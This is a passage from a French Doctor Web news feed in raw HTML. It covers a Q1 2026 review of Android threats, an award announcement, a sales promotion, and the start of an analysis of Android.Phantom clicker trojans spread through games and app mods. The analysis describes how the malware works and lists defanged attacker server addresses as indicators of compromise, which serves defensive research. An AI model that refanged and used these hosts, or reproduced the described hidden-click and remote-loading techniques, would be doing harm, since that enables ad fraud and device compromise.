    &lt;dd&gt;Détection de l'obfuscateur, utilisé notamment pour protéger des applications malveillantes (par exemple, certaines versions du cheval de Troie bancaire &lt;b&gt;Android.SpyMax&lt;/b&gt;).&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Android.Click&amp;lng=fr"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Détection des mods malveillants de la messagerie WhatsApp, qui de manière invisible pour l'utilisateur, peut charger différents sites en arrière-plan.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/april/review_mobile_q1/02_unwanted_q1_2026_en.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/april/review_mobile_q1/02_unwanted_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Program.FakeAntiVirus&amp;lng=fr"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programmes publicitaires imitant le fonctionnement des logiciels antivirus. Ces programmes peuvent signaler des menaces inexistantes et tromper les utilisateurs en demandant de payer une version complète.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Program.FakeMoney&amp;lng=fr"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Applications qui permettent prétendument de gagner de l'argent en effectuant certaines actions ou tâches. Elles imitent l'accumulation de récompenses, alors que pour retirer l'argent « gagné », il est nécessaire d'accumuler un certain montant. Elles proposent généralement une liste de systèmes de paiement et de banques populaires par lesquels il serait possible de retirer les récompenses. Mais même lorsque les utilisateurs parviennent à accumuler un montant suffisant pour effectuer un retrait, les paiements promis ne sont pas versés. Cette entrée de la base détecte également d'autres logiciels indésirables basés sur le code de tels programmes.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Program.CloudInject&amp;lng=fr"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Program.CloudInject&amp;lng=fr"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Détection des applications Android modifiées à l'aide du service CloudInject et de l'utilitaire Android du même nom (ajouté à la base de données de virus Dr.Web sous le nom de &lt;a href="https://vms.drweb.fr/search/?q=Tool.CloudInject&amp;lng=fr"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Ces programmes sont modifiés sur un serveur distant, tandis que l'utilisateur (moddeur) intéressé à les changer ne contrôle pas ce qui y sera intégré. De plus, les applications reçoivent un ensemble d'autorisations dangereuses. Après la modification, l'utilisateur qui fait du modding (moddeur) reçoit une possibilité de contrôler à distance ces programmes — les bloquer, afficher des boîtes de dialogue personnalisées, suivre l'installation et la désinstallation d'autres logiciels, etc.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Application conçue pour surveiller les propriétaires d'appareils Android. Cette appli permet de lire les SMS, de recevoir des informations sur les appels téléphoniques, de suivre les coordonnées de l'appareil et d'effectuer un enregistrement audio de l'environnement.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/april/review_mobile_q1/03_riskware_q1_2026_en.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/april/review_mobile_q1/03_riskware_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Tool.Obfuscator.TrashCode&amp;lng=fr"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Tool.Obfuscator.TrashCode&amp;lng=fr"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Détection des applications Android ayant subi une injection de code malveillant à l'aide d'outils de modding d'applications utilisés par des pirates informatiques. Cette modification vise à masquer la logique du programme. Cette technique est fréquemment utilisée dans les chevaux de Troie bancaires et les versions piratées de logiciels.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Détection des applications Android modifiées à l'aide de l'utilitaire NP Manager. Cet utilitaire contient divers modules permettant d'obfusquer et de protéger le code du programme, ainsi que de contourner la vérification de leur signature numérique après modification. L'obfuscation qu'elle ajoute est souvent utilisée dans les logiciels malveillants pour les rendre plus difficiles à détecter et à analyser.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Tool.LuckyPatcher&amp;lng=fr"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Utilitaire qui permet de modifier les applications Android installées (créer des correctifs pour elles) afin de changer la logique de leur fonctionnement ou de contourner certaines restrictions. Il permet notamment, de désactiver la vérification de l'accès root dans les applications bancaires ou d’obtenir des ressources illimitées dans les jeux. Pour créer ces correctifs, l'utilitaire télécharge des scripts spécialement préparés sur Internet, que n'importe qui peut créer et ajouter à la base de données commune. La fonctionnalité de ces scripts peut également être malveillante, c'est pourquoi les correctifs créés peuvent représenter un danger potentiel.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/april/review_mobile_q1/04_adware_q1_2026_en.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/april/review_mobile_q1/04_adware_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Adware.Bastion&amp;lng=fr"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Détection des programmes d'optimisation qui créent périodiquement des notifications contenant des messages trompeurs concernant une mémoire insuffisante et des erreurs système supposées, afin d'afficher des publicités pendant « l'optimisation ».&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Adware.AdPush&amp;lng=fr"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Module publicitaire pouvant être intégré à des applications Android. Il affiche des publicités qui induisent les utilisateurs en erreur. Par exemple, ces notifications peuvent ressembler aux messages du système d'exploitation. De plus, le module collecte un certain nombre de données confidentielles, et est également capable de télécharger d'autres applications et d'initier leur installation.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Opensite.15&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Des applications déguisées en outils de triche pour obtenir des ressources dans les jeux. En réalité, elles sont conçues pour afficher des publicités. Ces programmes reçoivent une configuration d'un serveur distant, selon laquelle ils chargent un site web cible avec des publicités (bannières, pop-ups, vidéos, etc.).&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Adware.Fictus&amp;lng=fr"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Module publicitaire que les pirates intègrent dans des versions clonées de jeux et d'applications Android populaires. Son intégration dans les programmes se fait à l'aide d'un packer spécialisé net2share. Les copies du logiciel ainsi créées sont distribuées via divers répertoires d'applications et affichent des publicités indésirables après l'installation.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Airpush.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Modules publicitaires qui sont intégrés dans des applications Android et affichent différentes publicités. Selon leur version et modification, il peut s'agir de publicités, de pop-ups ou de bannières. A l'aide de ces modules, les pirates distribuent souvent des malwares en proposant d'installer des applications. De plus, de tels modules transmettent diverses informations confidentielles à un serveur distant.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Menaces sur Google Play&lt;/h3&gt;

&lt;p&gt;Au premier trimestre 2026, les spécialistes du laboratoire antivirus Doctor Web ont découvert davantage d'applications malveillantes &lt;a href="https://vms.drweb.fr/search/?q=Android.Joker&amp;lng=fr"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; dans le catalogue Google Play, qui abonnent les victimes à des services payants. Les chevaux de Troie ont été dissimulés dans plusieurs utilitaires d'optimisation Android et distribués sous forme de messageries instantanées, d'applications multimédias et d'autres logiciels. Au total, ces applications ont été téléchargées au moins 370 000 fois par les utilisateurs.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/april/review_mobile_q1/05_Android.Joker.2524.jpg" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/april/review_mobile_q1/05_Android.Joker.2524.1.jpg"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/april/review_mobile_q1/06_Android.Joker.2511.jpg" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/april/review_mobile_q1/06_Android.Joker.2511.1.jpg"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Exemples de logiciels malveillants &lt;b&gt;Android.Joker&lt;/b&gt; détectés sur Google Play au premier trimestre &lt;b&gt;Android.Joker.2511&lt;/b&gt; a été intégré dans le messager Private Chat Message, et &lt;b&gt;Android.Joker.2524&lt;/b&gt; a été intégré dans l'application appareil photo Magic Camera.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;De plus, nos analystes de virus ont découvert les logiciels malveillants &lt;a href="https://vms.drweb.fr/search/?q=Android.Subscription&amp;lng=fr"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.23&lt;/b&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Android.Subscription&amp;lng=fr"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.24&lt;/b&gt;, qui sont également conçus pour connecter les utilisateurs à des services payants. Les chevaux de Troie chargent des sites web qui activent des abonnements mobiles payants en utilisant la technologie Wap Click. Ces sites demandent aux utilisateurs un numéro de téléphone portable, puis essaient de se connecter automatiquement au service. Ces deux applications malveillantes ont été téléchargées plus de 1,5 million de fois depuis Google Play.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/april/review_mobile_q1/07_Android.Subscription.23.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/april/review_mobile_q1/07_Android.Subscription.23.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/april/review_mobile_q1/08_Android.Subscription.24.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/april/review_mobile_q1/08_Android.Subscription.24.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Les logiciels malveillants &lt;b&gt;Android.Subscription.23&lt;/b&gt; et &lt;b&gt;Android.Subscription.24&lt;/b&gt; ont été distribués sous le couvert des applications de finances personnelles Stream Hive et Prime Link, mais leur seule fonctionnalité consistait à charger des sites Web qui connectaient les propriétaires d'appareils Android à des services mobiles payants.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Pour protéger vos appareils Android contre les applications malveillantes et indésirables, nous vous recommandons d’installer les produits antivirus &lt;a href="https://products.drweb.fr/mobile/android/" target="_blank"&gt;Dr.Web pour Android&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q1%202026%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Indicateurs de compromission&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.fr/show/?i=15134&amp;lng=fr</guid><title>La solution Dr.Web pour la protection des ordinateurs personnels a reçu le prix SKD AWARDS</title><link>https://news.drweb.fr/show/?i=15134&amp;lng=fr&amp;c=5</link><pubDate>Thu, 26 Mar 2026 13:06:16 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Dr.Web Security Space, solution de protection pour ordinateurs personnels, a de nouveau été récompensée par le prestigieux prix SKD AWARDS. Dr.Web Security Space a remporté la première place dans la catégorie « Antivirus pour PC ».&amp;nbsp;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Il s’agit du troisième prix consécutif de ce type pour Doctor Web. En 2023, Dr.Web Security Space 12.0 pour Windows avait remporté le prix dans la catégorie " Sécurité des ordinateurs personnels", et en 2024, la solution antivirus pour les ordinateurs personnels a de nouveau été reconnue comme la meilleure, tandis que Dr.Web Mobile Engine SDK a remporté le prix dans la catégorie " Moteurs antivirus ".&amp;nbsp;&lt;/p&gt;&lt;p&gt;SKD AWARDS est un programme de récompenses annuel présenté par SKD Labs, un laboratoire d'essais et de certification indépendant mondialement reconnu dans le domaine de la sécurité informatique. Ce prix est officieusement surnommé « l'Oscar des produits de cybersécurité » et est considéré comme l'un des indicateurs importants pour évaluer l'efficacité des produits spécialisés.&amp;nbsp;&lt;/p&gt;&lt;p&gt;Dans le cadre de ce prix, les produits subissent une série de tests qui évaluent leur fonctionnalité, leurs performances, leur innovation technique, leur comportement dans des scénarios réels et leur capacité à détecter les menaces et à y répondre.&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.fr/static/f2_admin/drweb-ss.jpg" data-fancybox=""&gt;&lt;img src="https://st.drweb.fr/static/new-www/news/2026/drweb-ss.jpg" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;</description></item><item><guid>https://news.drweb.fr/show/?i=15118&amp;lng=fr</guid><title>Offre Saint-Valentin : -50 % sur Dr.Web Security Space pour les appareils mobiles</title><link>https://news.drweb.fr/show/?i=15118&amp;lng=fr&amp;c=5</link><pubDate>Fri, 06 Feb 2026 13:30:20 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Du 9 au 16 février 2026, profitez de 50 % de remise sur Dr.Web Security Space pour les appareils mobiles sous Android.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Protégez ce qui compte&amp;nbsp;: avec Doctor Web vous pouvez faire des économies, tout en protégeant un être cher contre les menaces en ligne&amp;nbsp;: phishing, applications malveillantes, tentatives de vol de données et spam. Avec les solutions Dr.Web, restez protégé et naviguez en toute sécurité&amp;nbsp;!&lt;/p&gt;&lt;p&gt;Dr.Web Security Space pour les appareils mobiles — protection des appareils mobiles, des tablettes, des Smart TV et des consoles de jeux sous Android :&lt;/p&gt;&lt;ul&gt;&lt;li&gt;protège en permanence contre tous les types de logiciels malveillants&lt;/li&gt;&lt;li&gt;bloque les appels indésirables et le spam via SMS&lt;/li&gt;&lt;li&gt;assure la sécurité des données personnelles, transactions bancaires, achats et paiements en ligne &amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;Bénéficiez d’une remise de 50% lors de l’achat d’une licence de Dr.Web Security Space 2 appareils mobiles / 1 an&lt;/strong&gt;&lt;br&gt;&lt;br&gt;&lt;a class="btn" href="https://store.drweb.com/europe/basket/add/4855635?clear=Y"&gt;Acheter avec 50% de remise&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.fr/show/?i=15110&amp;lng=fr</guid><title>Android.Phantom : des chevaux de Troie Android diffusés via jeux et applications piratées</title><link>https://news.drweb.fr/show/?i=15110&amp;lng=fr&amp;c=5</link><pubDate>Tue, 03 Feb 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;strong&gt;Le 3 février 2026&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Les chevaux de Troie de la famille Android.Phantom infiltrent des smartphones via des jeux et des versions modifiées piratées d'applications populaires. Ils utilisent l'apprentissage automatique et le streaming vidéo pour augmenter le nombre de clics.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Des spécialistes du laboratoire antivirus Doctor Web ont détecté et analysé une nouvelle famille de chevaux de Troie dotés d'une fonctionnalité de clicker. Ils ont une chose en commun : ils sont soit contrôlés depuis le serveur &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt;, soit téléchargés et exécutés par commande depuis celui-ci. &lt;/p&gt;

&lt;p&gt;Ce type de logiciel malveillant infecte les smartphones fonctionnant sous Android.&lt;/p&gt;

&lt;p&gt;L'un des canaux de propagation des chevaux de Troie est le catalogue officiel d'applications pour les appareils Xiaomi, GetApps.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/01_Android.Phantom.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/01_Android.Phantom.1.png" alt="#drweb"&gt; 
    &lt;/a&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/02_Android.Phantom.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/02_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Nous avons identifié plusieurs jeux mobiles contenant des logiciels malveillants : Creation Magic World (plus de 32 000 téléchargements), Cute Pet House (&gt;34 000 téléchargements), Amazing Unicorn Party (&gt;13 000 téléchargements), Академия мечты Сакура (&gt;4 000 téléchargements), Theft Auto Mafia (&gt;61 000 téléchargements), Open World Gangsters (&gt;11 000 téléchargements). Tous les jeux infectés sont publiés pour le compte du seul développeur, SHENZHEN RUIREN NETWORK CO., LTD. Des chevaux de Troie y sont intégrés et s'exécutent en même temps que les applications. &lt;/p&gt;

&lt;p&gt;Les versions initiales des jeux ne contenaient aucun logiciel malveillant. Le 28 et le 29 septembre, le développeur a publié des mises à jour pour les jeux contenant le cheval de Troie &lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.2.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;. Il fonctionne dans deux modes, qui dans le code du programme sont conventionnellement appelés mode de signalisation (signaling) et mode fantôme (phantom).&lt;/p&gt;

&lt;p&gt;En mode fantôme, le logiciel malveillant utilise un navigateur intégré basé sur le widget WebView, caché à l'utilisateur. Le site cible pour l'augmentation des clics et le fichier JavaScript « phantom » y sont chargés sur commande depuis le serveur &lt;span class="string"&gt;hxxps[:]//playstations[.]click&lt;/span&gt;. Ce dernier contient un script permettant d'automatiser les actions sur les publicités du site chargé et le framework d'apprentissage automatique TensorFlowJS. Le modèle de ce framework est téléchargé depuis le serveur &lt;span class="string"&gt;hxxps[:]//app-download[.]cn-wlcb[.]ufileos[.]com&lt;/span&gt; vers le répertoire de l'application. Dans certains scénarios de fonctionnement avec certains types de publicité, &lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.2.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt; place un navigateur sur un écran virtuel et prend des captures d'écran. Le Trojan les analyse à l'aide d'un modèle pour le framework TensorFlowJS, puis clique sur les éléments détectés.&lt;/p&gt;

&lt;p&gt;En mode signalisation, le cheval de Troie se connecte à un serveur tiers via WebRTC. Cette technologie permet aux navigateurs et aux applications d'établir une connexion directe pour échanger des données, de l'audio et de la vidéo en temps réel sans installer de logiciel supplémentaire. En mode signaling, le &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt; déjà mentionné agit comme un serveur de signalisation, établissant des connexions entre les nœuds WebRTC. Ce serveur détermine également le mode de fonctionnement du cheval de Troie : phantom ou signaling. Les tâches avec des sites cibles proviennent de &lt;span class="string"&gt;hxxps[:]//playstations[.]click&lt;/span&gt;. Puis, à l’insu de l’utilisateur, &lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.2.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt; diffuse aux attaquants, une vidéo de l'écran virtuel affichant le site web chargé dans le navigateur. Le cheval de Troie permet à un nœud WebRTC connecté de contrôler à distance le navigateur sur un écran virtuel : cliquer, faire défiler, saisir ou coller du texte dans un formulaire de saisie.&lt;/p&gt;

&lt;p&gt;Le 15 et le 16 octobre, les jeux mentionnés ci-dessus ont reçu une nouvelle mise à jour. En plus d'&lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.2.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;, ils ont reçu le module intégré &lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.5&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;. Il s'agit d'un dropper (programme d'installation) contenant le chargeur de code distant &lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.4.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;. Ce programme télécharge plusieurs autres chevaux de Troie conçus pour simuler des clics sur différents sites web. Ces modules sont plus simples que le clicker &lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.2.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt; : ils n'utilisent ni apprentissage automatique ni streaming vidéo, mais sont pilotés par des scripts de clic écrits en JavaScript. &lt;/p&gt;

&lt;p&gt;Pour utiliser la technologie WebRTC sous Android, le cheval de Troie doit se connecter à une bibliothèque spécialisée via l'API Java, qui n'est pas incluse dans le système d'exploitation standard ni dans les applications téléchargées. Par conséquent, dans un premier temps, le cheval de Troie fonctionnait principalement en mode phantom. Avec l'ajout d'&lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.5&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;, à l'application, le Trojan &lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.2.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt; a acquis la capacité d'utiliser le chargeur de code distant &lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.4.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt; pour charger la bibliothèque nécessaire. &lt;/p&gt;

&lt;p&gt;Les attaquants utilisent également d'autres canaux pour distribuer les chevaux de Troie &lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.2.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.5&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;. Par exemple, des mods pour le streaming musical Spotify avec des fonctionnalités premium débloquées. Elles sont publiées sur différents sites web, voici quelques exemples :&lt;/p&gt;

&lt;div class="flex justify-center gap-3"&gt;
    &lt;div class="flex flex-col gap-3"&gt;
        &lt;div class="img"&gt;
            &lt;a href="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/03_Android.Phantom.png" data-fancybox=""&gt;
                &lt;img src="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/03_Android.Phantom.1.png" alt="#drweb"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;p class="text-center"&gt;&lt;i&gt;Site Spotify Plus&lt;/i&gt;&lt;/p&gt;
    &lt;/div&gt;
    &lt;div class="flex flex-col gap-3"&gt;
        &lt;div class="img"&gt;
            &lt;a href="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/04_Android.Phantom.png" data-fancybox=""&gt;
                &lt;img src="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/04_Android.Phantom.1.png" alt="#drweb"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;p class="text-center"&gt;&lt;i&gt;Site Spotify Pro&lt;/i&gt;&lt;/p&gt;
    &lt;/div&gt;
&lt;/div&gt;

&lt;p class="mt-5"&gt;Et dans les canaux Telegram spécialisés :&lt;/p&gt;

&lt;div class="flex flex-col md:flex-row justify-center gap-3"&gt;
    &lt;div class="flex flex-col gap-1"&gt;
        &lt;div class="img"&gt;
            &lt;a href="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/05_Android.Phantom.png" data-fancybox=""&gt;
                &lt;img src="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/05_Android.Phantom.1.png" alt="#drweb"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;p class="text-center"&gt;&lt;i&gt;Spotify Pro&lt;/i&gt;&lt;br&gt;&lt;i&gt;(54 400 abonnés)&lt;/i&gt;&lt;/p&gt;
    &lt;/div&gt;
    &lt;div class="flex flex-col gap-1"&gt;
        &lt;div class="img"&gt;
            &lt;a href="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/06_Android.Phantom.png" data-fancybox=""&gt;
                &lt;img src="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/06_Android.Phantom.1.png" alt="#drweb"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;p class="text-center"&gt;&lt;i&gt;Spotify Plus – Official&lt;/i&gt;&lt;br&gt;&lt;i&gt;(15 057 abonnés)&lt;/i&gt;&lt;/p&gt;
    &lt;/div&gt;
&lt;/div&gt;

&lt;p class="mt-5"&gt;Les mods Spotify publiés sur les sites web et dans les chaînes Telegram présentés dans les captures d'écran contiennent &lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.2.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt; et une bibliothèque pour la communication WebRTC sur Android. &lt;/p&gt;

&lt;p&gt;A part les mods Spotify, les pirates installent également des chevaux de Troie dans les mods d'autres applications populaires : YouTube, Deezer, Netflix et autres. Ils sont publiés sur des sites de mods spécialisés :&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/07_Android.Phantom.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/07_Android.Phantom.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Site Apkmody&lt;/i&gt;&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/08_Android.Phantom.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/08_Android.Phantom.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Site Moddroid&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Le site web Moddroid contient une section « Choix de l'éditeur ». Sur les 20 applications qu'elle contenait, seules 4 étaient saines. Les 16 autres contenaient des chevaux de Troie de la famille Android.Phantom. Les applications de ces deux sites sont téléchargées à partir du même serveur CDN &lt;span class="string"&gt;hxxps[:]//cdn[.]topmongo[.]com&lt;/span&gt;. Ces sites possèdent leurs propres canaux Telegram où les utilisateurs téléchargent des mods infectés par des chevaux de Troie :&lt;/p&gt;

&lt;div class="flex flex-col md:flex-row justify-center gap-3"&gt;
    &lt;div class="flex flex-col gap-1"&gt;
        &lt;div class="img"&gt;
            &lt;a href="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/09_Android.Phantom.png" data-fancybox=""&gt;
                &lt;img src="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/09_Android.Phantom.1.png" alt="#drweb"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;p class="text-center"&gt;&lt;i&gt;Moddroid.com&lt;/i&gt;&lt;br&gt;&lt;i&gt;(87 653 abonnés)&lt;/i&gt;&lt;/p&gt;
    &lt;/div&gt;
    &lt;div class="flex flex-col gap-1"&gt;
        &lt;div class="img"&gt;
            &lt;a href="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/10_Android.Phantom.png" data-fancybox=""&gt;
                &lt;img src="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/10_Android.Phantom.1.png" alt="#drweb"&gt;
